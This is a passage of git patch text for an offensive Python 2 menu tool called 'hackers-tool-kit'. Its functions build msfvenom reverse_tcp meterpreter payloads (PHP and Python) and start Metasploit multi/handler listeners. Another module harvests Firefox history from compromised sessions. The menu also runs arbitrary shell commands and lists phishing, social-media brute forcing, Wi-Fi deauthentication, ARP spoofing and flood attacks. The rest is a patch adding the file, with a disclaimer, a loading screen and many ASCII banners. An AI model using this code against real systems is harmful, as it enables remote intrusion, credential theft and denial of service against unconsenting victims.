phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr foxhis.rc') -#----------# -#FOXHIS END# - - -#RHAWK START# -#-----------# -def rhawk(): - os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") -#---------# -#RHAWK END# - - -#NANO START# -#----------# -def nano(): - print "opening nano in \033[93m/root/\033[0m folder" - os.system("sleep 2") - os.system("cd /root/ && nano") -#--------# -#NANO END# - - -#UPDATE HACKERS-TOOL-KIT START# -#-----------------------------# -def update(): - os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") -#---------------------------# -#UPDATE HACKERS-TOOL-KIT END# - -#COMPILE C START# -#---------------# -def compilec(): - print "filename / filepath" - r = raw_input("> ") - print "\nfilename2 / filepath2" - h = raw_input("> ") - - a = 'g++ {0} -o {1}'.format(r,h) - os.system(a) -#COMPILE C END# -#-------------# - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - if x == "rhawk": - rhawk() - if x == "nano": - nano() - if x == "update": - update() - if x == "compilec": - compilec() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 08eb3b59e3694c070fcacb3d0920d7ebfb45e470 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 28 Jun 2019 04:50:36 +0100 Subject: [PATCH 175/214] Add files via upload --- htk.py | 3228 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3228 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..b9012ad --- /dev/null +++ b/htk.py @@ -0,0 +1,3228 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#WARNING START# +#-------------# +from tkinter import * +win = Tk() +warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' +messageVar = Message(win, text = warn) +messageVar.config(bg='red') +messageVar.pack( ) +win.title('HTK: Warning!') +button = Button(win, text='OK', width=25, command=win.destroy) +button.pack() +win.mainloop() +#-----------# +#WARNING END# + +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ 